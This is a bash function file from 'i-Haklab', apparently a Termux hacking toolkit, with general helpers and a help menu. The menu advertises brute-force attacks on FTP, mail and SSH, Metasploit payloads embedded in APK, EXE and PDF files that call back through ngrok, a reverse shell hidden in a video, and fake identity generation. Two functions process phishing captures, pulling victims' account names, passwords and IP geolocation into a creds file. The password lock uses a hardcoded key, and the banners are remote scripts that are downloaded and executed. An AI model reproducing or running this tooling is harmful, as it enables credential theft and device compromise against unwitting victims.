#!/data/data/com.termux/files/usr/bin/bash
# This file contain all i-Haklab functions

LOGFILE='/data/data/com.termux/files/usr/var/log/i-Haklab.log'

banner() {
	[[ ! -e /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/i-Haklab ]] && {
		wget --tries=20 --quiet \
			https://raw.githubusercontent.com/ivam3/i-Haklab/master/.deb/home/.local/etc/i-Haklab/banner/i-Haklab \
				-O /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/i-Haklab;
	}
	bash /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/i-Haklab;
	sleep 0.5;
}
export -f banner

k-boom() { 
	[[ ! -e /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/k-boom ]] && {
		wget --tries=20 --quiet \
		https://raw.githubusercontent.com/ivam3/i-Haklab/master/.deb/home/.local/etc/i-Haklab/banner/k-boom \
		-O /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/k-boom &>/dev/null;
	}
	source /data/data/com.termux/files/home/.local/etc/i-Haklab/banner/k-boom;
}
export -f k-boom

ctrl_c(){ k-boom;exit 0;}
export -f ctrl_c

running(){
	[[ $1 = "time" ]] && {
		sleep $2 &
			n=$(echo $!);
	}
	[[ $1 = "ps" ]] && {
		n=$2;
	}
	pid=$n
  spinner=( '█■■■■' '■█■■■' '■■█■■' '■■■█■' '■■■■█' )
  while [ "$(ps a|awk '{print $1}'|grep $pid)" ]; do
		for i in "${spinner[@]}";do
			tput civis
			printf  "$G\r(_➤) Searching\t$i\b\b\b\b\b\b\b\b";
    done
  done
  tput cnorm
  printf "\t$W[$G¡RUN!$W]\n";
}
export -f running

STDERROOT(){ printf "$R\n(_➤)$W Rooted device required";exit;}
export -f STDERROOT

STDERR(){
	[[ $# -eq 0 ]] && {
		printf "$R(_➤)$W missing argument, type i-Haklab help for helpper\n";
			exit;
		}
	[[ $1 = broken ]] && {
		printf "$R(_➤)$W i-Haklab is broken, please reinstall it.";
			exit;
		}
}
export -f STDERR

chk-Cuser() {
	while [ ! $(id -u) -ne 0 ]; do
        	printf "$R\n(_➤)$W You need to be a common user\n"
        	exit
	done
}
export -f chk-Cuser

chk-Ruser() {
	while [ ! $(id -u) -eq 0 ]; do
		printf "$R\n(_➤) You need to be a root user$W\n"
		exit
	done
}
export -f chk-Ruser

chk-pkg(){
	command -v $1 >/dev/null || { printf "$R(_➤)$W $1 needed$R |$W run apt install $2";exit;}
}
export -f chk-pkg

chk-root(){
	if [[ -x /system/xbin/su ]] || [[ -x /su/bin/su ]] || [[ -x /sbin/su ]]
	then
		return 0
	else
		return 1
	fi
}
export -f chk-root

chk-network(){
	until ping -q -c1 -W 1 8.8.8.8 >/dev/null 2>/dev/null
	do
		printf "$R(_➤) Please connect to internet$W\n"
		exit
	done
}
export -f chk-network

chk-tunnel() {
	if ping -q -c 1 -W 1 localtunnel.me >/dev/null 2>&1;then
		TUNNEL="localtunnel.me"
	elif ping -q -c 1 -W 1 serverless.social >/dev/null 2>&1;then
		TUNNEL="serverless.social"
	else
		printf "$R\n(_➤)$W Server not available$R |$W try it later\n"
		exit
	fi
}
export -f chk-tunnel

getPORT(){
	chk-pkg nmap nmap
	while [[ $(nmap -p$LPORT $LOOPBACK|grep "$LPORT"|awk -F " " '{print $2}') = "open" ]]
	do
		let LPORT=$LPORT+1
	done
}
export -f getPORT

helpper() {
	printf "$Y\n(_➤)$W i-Haklab $version (c) 2021 by @Ivam3 - Is a hacking laboratory that contains open source tools recommended by Ivam3. If the law is violated with it's use, this would be the responsibility of the user who handled it.\n$Y\nSyntax:$W i-Haklab [-option-] [-args-]\n
            $Y[--] Setting Options [--]$W
_$Y   OPTIONS$W  |$Y     ARGUMENTS$W     |$Y    DESCRIPTION$W
╰─about──────+──<name─of─tool>───➤ Show informations about tool/framework
|   ╰────example─────────────────{─i-Haklab about crunch─}
╰─help───────➤───────────────────➤ Show this help menu
╰─passwd─────+────set─|─pass─────➤ Set and change the login termux
|                 ╰─────|───────{─i-Haklab passwd set──➤ password|fingerprint
|                       ╰───────{─i-Haklab passwd pass─➤ get a new password
╰─setuser────➤───────────────────➤ Set i-Haklab user name
╰─show───────+─────alltools──────➤ List all tools/frameworks available on i-Haklab
|   ╰────────+────instatools─────➤ Show all installed tools/framewotks
|   ╰────────+──────books────────➤ Show all books available to download
|   ╰────────+─────tutorials─────➤ Show tutorials available
|   ╰────────+───────QG──────────➤ Show quick guides available
╰speedtest───➤───────────────────➤ Run a speed test of your network
╰─version────➤───────────────────➤ Show i-Haklab version installed
╰─weechat────➤───────────────────➤ Connect with irc Ivam3byCinderella chat
╰─Xwayland───➤───────────────────➤ Run xserver over Termux:wayland app with xfce4 as window manager
|            |                   |
|            |                   |
$Y       [--] Automatitation Options [--]$W
_$Y   OPTIONS$W  |$Y     ARGUMENTS$W     |$Y    DESCRIPTION$W
╰apkactivity─+─<path─to─apk─file>➤ Get the main activity from .apk file
|
╰─binchecker─➤───────────────────➤ Get informacion about BINs (CC,DC)
|
╰bruteforce─+─ftp|mail|ssh|telnet➤ Brute force attack at several servers.
|    ╰───example─for─ftp─────────{─i-Haklab bruteforce ftp
|    ╰───example─for─mail────────{─i-Haklab bruteforce mail ivam3@live.com, gmail or live.com
|
╰──ESmsg────+──encode/decode─────➤ Encode|decode secret message into a ASCII file.
|                    ╰──example──{─i-Haklab ESmsg <encode/decode-}
|
╰──fakeID───+──<option─+─args>───➤ Create a fake indentity card with real email and phone number
|    ╰───example─────────────────{─i-Haklab fakeID [for random settings]
|    ╰───example─────────────────{─i-Haklab fakeID -h [for help]
|    ╰───example─────────────────{─i-Haklab fakeID -g male -n America -c \"United States\"
╰──tunnel───+─<port─+─subdomain>─➤ Start a SSH client to request TCP port forwarding
|    ╰───example─────────────────{─i-Haklab tunnel -p 4444 -s my-subdomain-}
|
╰─handler───+─<name─of─file.rc>──➤ Start handler on msfconsole with previous setting
|
╰───msf─────+─dirscan─+─IPtarget─➤ Enumerate directories/subdirecotires from a server.
|    |          ╰──example───────{─i-Haklab msf dirscan 10.10.10.242-}
|    ╰──────+─embed──────────────➤ Embed a metasploit payload into legitim apk file.
|               ╰─ex─for─outlan──{─i-Haklab msf embed 6.tcp.ngrok.io 4546 /path/to/file.apk
|    ╰──────+─payapk─+─tun0:port─➤ Create a coded payload .apk
|    |          ╰─ex─for─outlan──{─i-Haklab msf payapk 6.tcp.ngrok.io 23453─}
|    ╰──────+─payexe─+─tun0:port─➤ Create a coded payload .exe
|    |         ╰─ex─for─inlan───{─i-Haklab msf payexe 192.168.0.1 8080─}
|    ╰──────+─paypdf─+─tun0:port─➤ Create a coded payload .pdf
|    |          ╰─ex─default─set─{─i-Haklab msf paypdf─}
|    ╰──────+──────shodan────────➤ Search vulnerable webcam servers using metasploit
|
╰─ngroklink─➤────────────────────➤ Show the current ngrok link
|
╰─ngrokssh──➤────────────────────➤ Connect with ngrok.io servers via SSH protocol
|
╰─payvid────➤────────────────────➤ Hide a Reverse Shell with a Video File by Exploiting Linux OS.
|
╰─phonescan─+─<phonenumber>──────➤ A phone number information scaner
|                  ╰──example────{─i-Haklab phonescan 525584923476─}
|
╰servers4test────────────────────➤ Init deliberately insecure web application for pentesting.
|
╰──share────➤────────────────────➤ Init web server for share files remotely and securely
|    ╰───────────────────────────{─Default credentials = Admin:password─}
|           |                    |
|           |                    |
$Y          [--] DIRECT COMMANDS [--]
$W  Those commands do not need the i-Haklab command
             Just type the command.
_$Y        COMMAND$W                 |$Y    DESCRIPTION$W
╰apt─────────────────────────────➤ Install/remove and configure packages/tools/frameworks
╰fixer───────────────────────────➤ Automate process to fix Termux issues
╰LOCALHOST───────────────────────➤ Show the current internet protocol over LAN
╰lock────────────────────────────➤ Block Termux's screen
╰osrframework────────────────────➤ OSINT setoolkit
╰mypip───────────────────────────➤ Show your public internet protocol
╰omf─theme───────────────────────➤ Change Oh-my-fish theme
╰postgresql──────────────────────➤ Star stop or restart postgres data base
╰proxy───────────────────────────➤ Execute cli commands over tor proxychains
╰serverapache────────────────────➤ Init apache server
╰serverphp───────────────────────➤ Init php server
╰sudo────────────────────────────➤ Execute commands or init an enviroment as fake root user
╰traductor───────────────────────➤ Init a command line traductor
╰──────────────────────────────────────────────────────────────────────────────────────────|\n\n"
}
export -f helpper

printTable(){
    local -r delimiter="${1}"
    local -r data="$(removeEmptyLines "${2}")"

    if [[ "${delimiter}" != '' && "$(isEmptyString "${data}")" = 'false' ]]
    then
			local -r numberOfLines="$(wc -l <<< "${data}")"
			if [[ "${numberOfLines}" -gt '0' ]]
			then
					local table=''
					local i=1
					for ((i = 1; i <= "${numberOfLines}"; i = i + 1))
					do
							local line=''
							line="$(sed "${i}q;d" <<< "${data}")"
							local numberOfColumns='0'
							numberOfColumns="$(awk -F "${delimiter}" '{print NF}' <<< "${line}")"
							if [[ "${i}" -eq '1' ]]
							then
									table="${table}$(printf '%s#+' "$(repeatString '#+' "${numberOfColumns}")")"
							fi
							table="${table}\n"
							local j=1
							for ((j = 1; j <= "${numberOfColumns}"; j = j + 1))
							do
									table="${table}$(printf '#| %s' "$(cut -d "${delimiter}" -f "${j}" <<< "${line}")")"
							done
							table="${table}#|\n"
							if [[ "${i}" -eq '1' ]] || [[ "${numberOfLines}" -gt '1' && "${i}" -eq "${numberOfLines}" ]]
							then
									table="${table}$(printf '%s#+' "$(repeatString '#+' "${numberOfColumns}")")"
							fi
					done

					if [[ "$(isEmptyString "${table}")" = 'false' ]]
					then
							echo -e "${table}" | column -s '#' -t | awk '/^\+/{gsub(" ", "-", $0)}1'
					fi
        fi
    fi
}
export -f printTable

removeEmptyLines(){
    local -r content="${1}"
    echo -e "${content}" | sed '/^\s*$/d'
}
export -f removeEmptyLines

repeatString(){
    local -r string="${1}"
    local -r numberToRepeat="${2}"
    if [[ "${string}" != '' && "${numberToRepeat}" =~ ^[1-9][0-9]*$ ]]
    then
        local -r result="$(printf "%${numberToRepeat}s")"
        echo -e "${result// /${string}}"
    fi
}
export -f repeatString

isEmptyString(){
    local -r string="${1}"
    if [[ "$(trimString "${string}")" = '' ]]
    then
        echo 'true' && return 0
    fi
    echo 'false' && return 1
}
export -f isEmptyString

trimString(){
    local -r string="${1}"
    sed 's,^[[:blank:]]*,,' <<< "${string}" | sed 's,[[:blank:]]*$,,'
}
export -f trimString

pass(){
	user=$(grep "USER" ${HOME}/.local/etc/fish/config.fish|awk '{print $NF}')
	[[ $1 = Set ]] && {
		login=$(grep "pass" ${HOME}/.local/libexec/i-Haklab.login|tail -n 1)
		select opt in Password Fingerprint Disable Exit
		do
			[[ $opt = Exit ]] && { exit 0;}
			[[ $opt = Password ]] && { opt="Get";}
			sed -i "s|$login|pass $opt|g" $HOME/.local/libexec/i-Haklab.login
			break
		done
	}

	[[ $1 = New ]] && {
		while read -sp "New password: " pass && printf "\n" && [[ -z $pass ]]
		do
			continue
		done
		while read -sp "Retype new password: " pass2 && printf "\n" && [[ -z $pass2 ]]
		do
			continue
		done
		[[ $pass = $pass2 ]] && {
			echo $pass|openssl enc -aes-256-cbc -md sha512 -a -pbkdf2 -iter 100000 \
			-salt -pass pass:Secret@123# > $HOME/.local/etc/i-Haklab/.Ivam3byCinderella;
					echo -en "\e[32mNew password was successfully set.\e[0m";
				} || { echo -en "\e[31mERROR:\e[0m Sorry, passwords do not match.";pass New;
			}
		}

		[[ $1 = Get ]] && {
			while read -sp "Password: " pass && [[ -z $pass ]]
			do
				continue
			done;
			until [[ $pass = $(cat $HOME/.local/etc/i-Haklab/.Ivam3byCinderella|openssl enc -aes-256-cbc -md sha512	-a -d -pbkdf2 -iter 100000	-salt -pass pass:Secret@123#) ]]
			do
				echo -en "\e[31mERROR:\e[0m wrong password\n"
#				termux-toast -b red Wrong password
				pass Get
			done
#			termux-toast -b green Welcome Back $user;
				banner;
			}

		[[ $1 = Fingerprint ]] && { touch $TMPDIR/lock.tmp;
			until [[ $(jq -r .auth_result $TMPDIR/lock.tmp) = "AUTH_RESULT_SUCCESS" ]]
			do
				termux-fingerprint -t "i-Haklab on Termux" -s "@Ivam3byCinderella" > $TMPDIR/lock.tmp
#				termux-toast -b red Access denied
			done;	rm $TMPDIR/lock.tmp;
#			termux-toast -b green Welcome Back $user;
			banner;
		}

		[[ $1 = Disable ]] && {
			echo "Access without pass" >>$LOGFILE
#			termux-toast -b green Welcome Back $user;
		}
}
export -f pass

phishing-CredsResults() {
	ACCOUNT=$(grep -o 'Account:.*' $TMP_PATH/usernames.txt | cut -d " " -f2)
	if [ ! -z $ACCOUNT ]; then
		printf "$G\n(_➤) ACCOUNT:$W$ACCOUNT"
		echo $ACCOUNT >> $TMP_PATH/creds.txt
		sleep 0.5
	fi
	PASSWD=$(grep -o 'Pass:.*' $TMP_PATH/usernames.txt | cut -d " " -f2)
	if [ ! -z $PASSWD ]; then
		printf "$G\n(_➤) PASSWORD:$W$PASSWD"
		echo $PASSWD >> $TMP_PATH/creds.txt
		sleep 0.5
	fi
}
export -f phishing-CredsResults

phishing-IPresults() {
IP=$(grep -a 'IP:' $TMP_PATH/ip.txt | cut -d " " -f2 | tr -d '\r' | head -n1)
IPTRACKER=$(curl -s -L "www.ip-tracker.org/locator/ip-lookup.php?ip=$IP" --user-agent "Mozilla/5.0 (X11: Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > $TMP_PATH/iptracker.log)

if [ ! -z $IP ]; then 
	printf "$G\n(_➤) IP:$W$IP"
	echo $IP >> $TMP_PATH/creds.txt
	sleep 0.5
fi

UA=$(grep 'User-Agent:' $TMP_PATH/ip.txt | cut -d '"' -f2 | head -n1 | awk '{print $1 $2 $3 $4 $5 $6}')
if [ ! -z $UA ]; then
	printf "$G\n(_➤) User Agent$W$UA"
	echo $UA >> $TMP_PATH/creds.txt
	sleep 0.5
fi
IP_SPEED=$(grep -o "IP Address Speed:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [ ! -z '$IP_SPEED' ]; then
	printf "$G\n(_➤) IP Address speed:$W$IP_SPEED"
	echo $IP_SPEED >> $TMP_PATH/creds.txt
	sleep 0.5
fi
IP_CURRENCY=$(grep -o "IP Currency:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [ ! -z '$IP_CURRENCY' ]; then
	printf "$G\n(_➤) IP Currency:$W$IP_CURRENCY"
	echo $IP_CURRENCY >> $TMP_PATH/creds.txt
	sleep 0.5
fi
CONTINENT=$(grep -o "Continent.*" $TMP_PATH/iptracker.log | cut -d ">" -f3 | cut -d "<" -f1)
if [ ! -z '$CONTINENT' ]; then
	printf "$G\n(_➤) Continent:$W$CONTINENT"
	echo $CONTINENT >> $TMP_PATH/creds.txt
	sleep 0.5
fi
COUNTRY=$(grep -o "Country:.*" $TMP_PATH/iptracker.log | cut -d ">" -f3 | cut -d "&" -f1)
if [ ! -z $COUNTRY ]; then
	printf "$G\n(_➤) Country:$W$COUNTRY"
	echo $COUNTRY >> $TMP_PATH/creds.txt
	sleep 0.5
fi
STATE=$(grep -o "tracking lessimpt.*" $TMP_PATH/iptracker.log | cut -d "<" -f1 | cut -d ">" -f2)
if [ ! -z '$STATE' ]; then
	printf "$G\n(_➤) State:$W$STATE"
	echo $STATE >> $TMP_PATH/creds.txt
	sleep 0.5
fi
CITY=$(grep -o "City Location:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [ ! -z $CITY ]; then
	printf "$G\n(_➤) City:$W$CITY"
	echo $CITY >> $TMP_PATH/creds.txt
	sleep 0.5
fi
ISP=$(grep -o "ISP:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [ ! -z $ISP ]; then
	printf "$G\n(_➤) ISP:$W$IPS"
	echo $ISP >> $TMP_PATH/creds.txt
	sleep 0.5
fi
AS_NUM=$(grep -o "AS Number" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [ ! -z '$AS_NUM' ]; then
	printf  "$G\n(_➤) AS Number:$W$AS_NUM"
	echo $AS_NUM >> $TMP_PATH/creds.txt
	sleep 0.5 
fi
}
export -f phishing-IPresults

